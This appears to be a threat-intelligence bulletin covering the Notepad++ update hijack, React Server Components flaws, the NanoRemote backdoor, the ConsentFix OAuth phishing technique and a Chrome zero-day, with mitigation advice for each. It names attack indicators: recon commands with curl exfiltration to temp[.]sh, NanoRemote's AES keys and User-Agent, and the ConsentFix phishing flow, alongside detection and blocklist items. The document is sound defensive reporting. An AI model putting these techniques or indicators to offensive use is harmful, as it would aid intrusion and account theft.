F5 Threat Report - December 17th, 2025

Notepad++ Fixes Flaw That Let Attackers Push Malicious Update Files

Notepad++ version 8.8.9 was released to address a security vulnerability in its WinGUp update tool, which had been exploited to deliver malicious executables instead of legitimate software updates. Reports indicated that the GUP.exe updater spawned an unauthorized "%Temp%\AutoUpdater.exe" process, which executed reconnaissance commands such as `netstat -ano`, `systeminfo`, `tasklist`, and `whoami`, subsequently exfiltrating the collected data in `a.txt` to `temp[.]sh` using `curl.exe`. To mitigate this, Notepad++ developer Don Ho initially released version 8.8.8 on November 18th, restricting updates to GitHub. A more robust fix arrived with version 8.8.9 on December 9th, which hardens the update process by verifying the digital signature and certificate of downloaded installers, aborting any update that fails this validation. Security expert Kevin Beaumont also noted three organizations experiencing security incidents linked to Notepad++ processes spawning initial access, suggesting potential hijacking of the update URL (`https://notepad-plus-plus.org/update/getDownloadUrl.php`) to redirect users to malicious downloads. Users are advised to upgrade to version 8.8.9 and remove any custom root certificates installed prior to v8.8.7, as all official binaries are now signed.

Severity: Critical

Sources

• https://buaq.net/go-380719.html
• https://gbhackers.com/notepad-flaw-attackers-hijack-update-traffic/
• https://malwaretips.com/threads/notepad-updater-installed-malware.138657/
• https://securityonline.info/urgent-patch-notepad-wingup-flaw-allowed-malware-to-hijack-updates/
• https://www.bleepingcomputer.com/news/security/notepad-plus-plus-fixes-flaw-that-let-attackers-push-malicious-update-files/
• https://www.hendryadrian.com/notepad-fixes-flaw-that-let-attackers-push-malicious-update-files/
• https://www.securitylab.ru/news/567129.php

Threat Details and IOCs

Mitigation Advice

• Identify all assets with Notepad++ installed and upgrade them to version 8.8.9 or newer.
• Using an EDR or endpoint management tool, scan all endpoints for the existence of the file `AutoUpdater.exe` in any `%Temp%` directory.
• Query endpoint and command-line logs for the execution of reconnaissance commands (`netstat`, `systeminfo`, `tasklist`, `whoami`) that redirect output to a file named `a.txt`.
• Add the domain `temp.sh` to your network blocklist on your firewall, DNS sinkhole, and web proxy.
• Audit user and system certificate stores for any custom root certificates related to older Notepad++ installations and remove them.

Compliance Best Practices

• Implement a software asset management (SAM) program to maintain a real-time inventory of all applications and versions installed on company assets to ensure timely patching.
• Develop and deploy an application control policy that prevents the execution of programs from user-writable directories such as `%Temp%`.
• Configure your EDR to generate alerts when common software updater processes spawn command shells (like cmd.exe or powershell.exe) to execute discovery commands.
• Implement a network egress filtering policy that denies outbound traffic by default and explicitly allows only traffic required for business operations.
• Incorporate modules into your security awareness training program that teach users how to verify official software download sources and recognize the risks of installing software from advertisements or untrusted websites.

---

Denial of Service and Source Code Exposure in React Server Components

Two new vulnerabilities have been identified in React Server Components, necessitating immediate upgrades for affected applications. These include a High Severity Denial of Service (CVE-2025-55184 and CVE-2025-67779, CVSS 7.5) and a Medium Severity Source Code Exposure (CVE-2025-55183, CVSS 5.3). The Denial of Service vulnerability allows a malicious HTTP request to trigger an infinite loop, consuming CPU and hanging the server process, even if an application does not implement React Server Function endpoints but supports React Server Components. The Source Code Exposure vulnerability enables an attacker to retrieve the source code of a Server Function if it explicitly or implicitly stringifies an argument, potentially leaking hardcoded secrets, though runtime secrets are unaffected. These vulnerabilities impact `react-server-dom-webpack`, `react-server-dom-parcel`, and `react-server-dom-turbopack` in versions 19.0.0, 19.0.1, 19.0.2, 19.1.0, 19.1.1, 19.1.2, 19.2.0, 19.2.1, and 19.2.2. Fixes have been backported to versions 19.0.3, 19.1.4, and 19.2.3, and all users are strongly advised to upgrade to these patched versions. Affected frameworks and bundlers include next, react-router, waku, @parcel/rsc, @vite/rsc-plugin, and rwsdk. Applications not using a server or not utilizing a framework/bundler that supports React Server Components are not affected.

Severity: Critical

Sources

• https://buaq.net/go-381099.html
• https://cyberpress.org/react-server-components-flaws-enable-dos-attacks-and-source-code-exposure/
• https://gbhackers.com/severe-flaws-in-react-server-components-enable-dos-attacks/
• https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components
• https://securityonline.info/react-patches-two-new-flaws-risking-server-crashing-dos-and-source-code-disclosure/
• https://thehackernews.com/2025/12/new-react-rsc-vulnerabilities-enable.html

Threat Details and IOCs

Mitigation Advice

• Scan all code repositories to identify applications using React Server Components, specifically looking for the vulnerable packages: `react-server-dom-webpack`, `react-server-dom-parcel`, `react-server-dom-turbopack`, or affected frameworks like `next` and `react-router`.
• For any application identified as using a vulnerable version of `react-server-dom-webpack`, upgrade the package to a patched version such as 19.0.3, 19.1.4, or 19.2.3.
• For any application identified as using a vulnerable version of `react-server-dom-parcel`, upgrade the package to a patched version such as 19.0.3, 19.1.4, or 19.2.3.
• For any application identified as using a vulnerable version of `react-server-dom-turbopack`, upgrade the package to a patched version such as 19.0.3, 19.1.4, or 19.2.3.
• For applications using affected frameworks like Next.js or react-router, upgrade the framework to a version that incorporates the patched React Server Component packages.

Compliance Best Practices

• Implement a centralized secrets management solution, such as HashiCorp Vault or a cloud-native option like AWS Secrets Manager or Azure Key Vault, to store and manage all application secrets instead of hardcoding them in source files.
• Integrate static application security testing (SAST) tools into the CI/CD pipeline to automatically scan for and block any code commits that contain hardcoded secrets.
• Configure and tune the Web Application Firewall (WAF) with rate-limiting rules to detect and block anomalous or high-volume requests targeting application endpoints, which can help mitigate denial-of-service attacks.
• Review and formalize the third-party software patch management policy to ensure critical vulnerabilities are identified and remediated within a defined timeframe, including subscribing to security advisories for all critical libraries and frameworks.

---

NanoRemote: Advanced Windows Backdoor Leveraging Google Drive API for Stealthy C2

NanoRemote is a sophisticated Windows backdoor, first identified in October 2025 by Elastic Security Labs, that leverages the Google Drive API for stealthy command-and-control (C2) and file staging, allowing its malicious traffic to blend with legitimate cloud operations. This C++ implant, associated with the espionage-linked REF7707 threat cluster (also known as CL‑STA‑0049, Earth Alux, Jewelbug), targets government, telecom, aviation, and education sectors, demonstrating an evolution from previous implants like FINALDRAFT which used the Microsoft Graph API. The attack chain typically involves WMLOADER, a loader masquerading as Bitdefender Security’s BDReinit.exe with an invalid signature, which decrypts and executes the NanoRemote payload from `wmsetup.log` using a rolling XOR routine followed by AES-CBC decryption with a key of `3A5AD78097D944AC`. NanoRemote itself communicates via HTTP POST, sending Zlib-compressed, AES-CBC encrypted JSON data to a non-routable IP at `/api/client` with the User-Agent `NanoRemote/1.0`, utilizing a hard-coded AES-CBC key of `558bec83ec40535657833d7440001c00` and Google Drive API OAuth 2.0 tokens for authentication. Its 22 command handlers enable extensive capabilities including system enumeration, file system operations, custom PE loader execution, remote command execution, and Google Drive download/upload tasks, further enhanced by `libPeConv` and Microsoft Detours for stealth. Detection is complicated by its cloud API abuse, necessitating behavioral detection rules, YARA rules for artifacts like `wmsetup.log`, and adherence to MITRE ATT&CK mappings (Exfiltration over Web Service, Masquerading, Discovery, Command Execution, Defence Evasion). Immediate incident response includes isolating infected machines, rotating Google API credentials, forensic analysis, auditing API logs for atypical Google Drive activity, and blocking known C2 IPs, while long-term remediation focuses on Zero-Trust principles, cloud API monitoring, and SIEM/UEBA integration.

Severity: Critical

Sources

• https://buaq.net/go-381078.html
• https://cyberpress.org/nanoremote-malware/
• https://cybersrcc.com/2025/12/11/nanoremote-advanced-windows-backdoor-leveraging-google-drive-api-for-stealthy-c2/
• https://malwaretips.com/threads/meet-nanoremote-a-newly-discovered-windows-backdoor-that-leverages-the-google-drive-api-for-data-theft-and-payload-staging.138663/
• https://thehackernews.com/2025/12/nanoremote-malware-uses-google-drive.html
• https://www.hendryadrian.com/nanoremote-cousin-of-finaldraft/

Threat Details and IOCs

Mitigation Advice

• Scan all Windows endpoints for the presence of files named 'wmsetup.log' and executables named 'BDReinit.exe' that have an invalid or missing digital signature.
• Search all available network logs (e.g., proxy, firewall, DNS) for outbound HTTP requests containing the User-Agent string 'NanoRemote/1.0'.
• Obtain and deploy the publicly available YARA rules for NanoRemote and WMLOADER into your endpoint detection and response (EDR) or other file scanning solutions.
• Use an EDR or endpoint management tool to query all Windows systems for the existence of the environment variable 'NR_GOOGLE_ACCOUNTS'.
• Create a SIEM or network intrusion detection system (NIDS) rule to alert on HTTP POST requests to any URI ending in '/api/client' that also originate from a process with the User-Agent 'NanoRemote/1.0'.
• If a compromise is suspected or confirmed, immediately review and revoke suspicious Google Workspace OAuth tokens and rotate API credentials for the affected accounts.

Compliance Best Practices

• Implement a Cloud Access Security Broker (CASB) to gain visibility into Google Drive API usage and establish policies to detect and alert on anomalous activity, such as unusually frequent uploads or downloads by a service account.
• Establish a data pipeline to ingest Google Workspace audit logs, specifically including Google Drive API activity, into your SIEM for centralized analysis and alerting.
• Initiate a recurring audit of all Google Workspace OAuth applications and service account permissions, revoking unnecessary or overly permissive API access based on the principle of least privilege.
• Refine and tune your Endpoint Detection and Response (EDR) platform's behavioral rules to generate high-fidelity alerts for suspicious memory allocation (VirtualAlloc) followed by execution, especially from non-standard processes.
• Implement application control policies on endpoints to restrict which executables are permitted to make outbound connections to known cloud service domains like 'googleapis.com'.

---

New ConsentFix Attack Hijacks Microsoft Accounts via Azure CLI

A novel ConsentFix attack, a variant of the ClickFix social engineering technique, has been identified that exploits the Azure CLI OAuth app to compromise Microsoft accounts, circumventing both password requirements and multi-factor authentication (MFA). This method, discovered by Push Security, initiates when a victim navigates to a compromised, high-ranking website displaying a deceptive Cloudflare Turnstile CAPTCHA that requests a business email. Upon validation against a target list, the victim is prompted to click a "Sign in" button, which directs them to a legitimate Microsoft Azure CLI login page. Following successful authentication or account selection, Microsoft redirects the user to a localhost URL containing an Azure CLI OAuth authorization code. The attacker then instructs the victim to paste this URL back into the malicious site, thereby granting the attacker full control over the Microsoft account via the Azure CLI OAuth app without ever acquiring the user's credentials or bypassing MFA directly. The attack is designed to trigger only once per victim IP address. To mitigate this threat, organizations should monitor for anomalous Azure CLI login activity, particularly from new IP addresses, and scrutinize the use of legacy Graph scopes. Detection can be further enhanced through Microsoft Defender for Cloud Apps' "Malicious OAuth app consent" policies, Azure AD Identity Protection's consent phishing and workload identity risk detections, and by actively monitoring AADGraphActivityLogs for unusual activity.

Severity: Critical

Sources

• https://cyberpress.org/consentfix-attack/
• https://www.bleepingcomputer.com/news/security/new-consentfix-attack-hijacks-microsoft-accounts-via-azure-cli/

Threat Details and IOCs

Mitigation Advice

• Review Azure AD sign-in logs for unusual Azure CLI login activity, focusing on logins from unexpected IP addresses, geolocations, or by users who do not typically use the Azure CLI.
• Create detection rules in your SIEM to alert on the use of legacy Azure AD Graph API scopes within OAuth consent grants, as this is a known attacker technique to evade detection.
• Send an immediate security bulletin to all employees warning them to never copy and paste a full URL from their browser's address bar into a website form, especially if the URL contains 'localhost' or authentication codes.

Compliance Best Practices

• Implement a recurring process to audit all OAuth applications in Azure AD, reviewing their permissions, usage, and business justification, and remove any unnecessary or overly permissive applications.
• Deploy and configure Microsoft Defender for Cloud Apps, enabling specific policies like 'Malicious OAuth app consent' to automatically detect and alert on suspicious OAuth application activity.
• Enable and monitor detections within Azure AD Identity Protection, specifically focusing on 'Consent Phishing' and 'workload identity risk' alerts, and create automated response actions for high-severity findings.
• Develop and enforce a policy based on the principle of least privilege to restrict Azure CLI access to only authorized administrative and developer roles.
• Establish a continuous security awareness training program that includes modules on identifying and responding to sophisticated phishing and consent grant attacks.

---

Google Patches Chrome Zero-Day Vulnerability Exploited in Attack

Google has released urgent updates for Chrome to address a newly patched zero-day vulnerability, tracked as 466192044, which is actively being exploited in the wild. This marks the eighth such security flaw fixed this year, following CVE-2025-13223, CVE-2025-10585, CVE-2025-6558, CVE-2025-6554, CVE-2025-5419, CVE-2025-2783, and CVE-2025-4664. While specific details on 466192044 are limited due to ongoing coordination, Google confirmed its active exploitation. Additionally, the updates resolve CVE-2025-14372, a Use-After-Free vulnerability in the Password Manager, and CVE-2025-14373, an inappropriate implementation issue in the Toolbar. All Google Chrome versions prior to 143.0.7499.109 are affected, and users are advised to upgrade immediately to stable channel version 143.0.7499.109/.110 for Windows/Mac or 143.0.7499.109 for Linux to mitigate these risks.

Severity: Critical

Sources

• https://buaq.net/go-380989.html
• https://threatprotect.qualys.com/2025/12/11/google-patches-zero-day-vulnerability-exploited-in-attack/
• https://www.techradar.com/pro/security/google-releases-emergency-fix-for-yet-another-zero-day

Threat Details and IOCs

Mitigation Advice

• Update all Google Chrome installations on Windows and macOS to version 143.0.7499.109/.110 and on Linux to version 143.0.7499.109.
• Initiate a vulnerability scan using Qualys QID 386201 to identify all endpoints with vulnerable versions of Google Chrome.

Compliance Best Practices

• Implement and configure an automated patch management solution to ensure security updates for all third-party software, especially web browsers, are deployed within 72 hours of release.
• Develop and enforce a security policy using Group Policy Objects (GPO) or a similar endpoint management tool to disable non-essential browser features, such as the built-in password manager, and enforce the use of a dedicated enterprise password management tool.

---